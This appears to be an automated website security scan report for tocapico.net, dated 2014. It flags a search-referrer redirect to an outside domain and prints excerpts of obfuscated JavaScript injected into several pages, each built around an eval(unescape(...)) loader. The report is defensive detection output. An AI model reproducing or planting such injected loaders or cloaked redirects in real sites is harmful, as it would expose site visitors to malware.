Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tocapico.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tocapico.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 05:33:25 GMT Location: http://lincau.osa.pl/se/ Server: Apache/1.3.41 (Unix) mod_layout/3.4 DAV/1.0.3 FrontPage/5.0.2.2635 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tocapico.net/ | 200 OK Content-Length: 34006 Content-Type: text/html | clean |
http://tocapico.net/rdv/index.html | 200 OK Content-Length: 13176 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;OO00=new Array();OO00[0]='<html>~zjead~script>eval(une~ape(\'\\146~ 65n%63~$4~ 51o~(E%20q%79%36~38~3~97B~(~96~<28wi~1~(~,157w~3~273~Cd~(5~(2a~
Antivirus reports:
http://tocapico.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 05:33:27 GMT Location: http://lincau.osa.pl/se/ Server: Apache/1.3.41 (Unix) mod_layout/3.4 DAV/1.0.3 FrontPage/5.0.2.2635 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lincau.osa.pl/se/ | 404 Not Found Content-Length: 320 Content-Type: text/html | clean |
http://lincau.osa.pl/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://tocapico.net/d/index.html | 200 OK Content-Length: 12866 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;OOOO=new Array();OOOO[0]=' <html>~ead~script>eval(une~ape(\'fu\\156%63ti~\'F~\'E%20q~#71%3~&28~09%7B~#5~66~98w~A~C~/64o~#67~0E~N3~\'~=~K~#45~X
Antivirus reports:
http://tocapico.net/salonbo/index.html | 200 OK Content-Length: 16973 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;ybDA7643NqPxz=new Array();igXaRVm1cj1zU=new Array();igXaRVm1cj1zU[0]='c\127\126%31%4AW\126' ;ybDA7643NqPxz[0]='<html>\r\n~zaead><script>eval(une~ape(\'~r%20%71~(9%3
Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tocapico.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tocapico.net/
Result: tocapico.net is not infected or malware details are not published yet.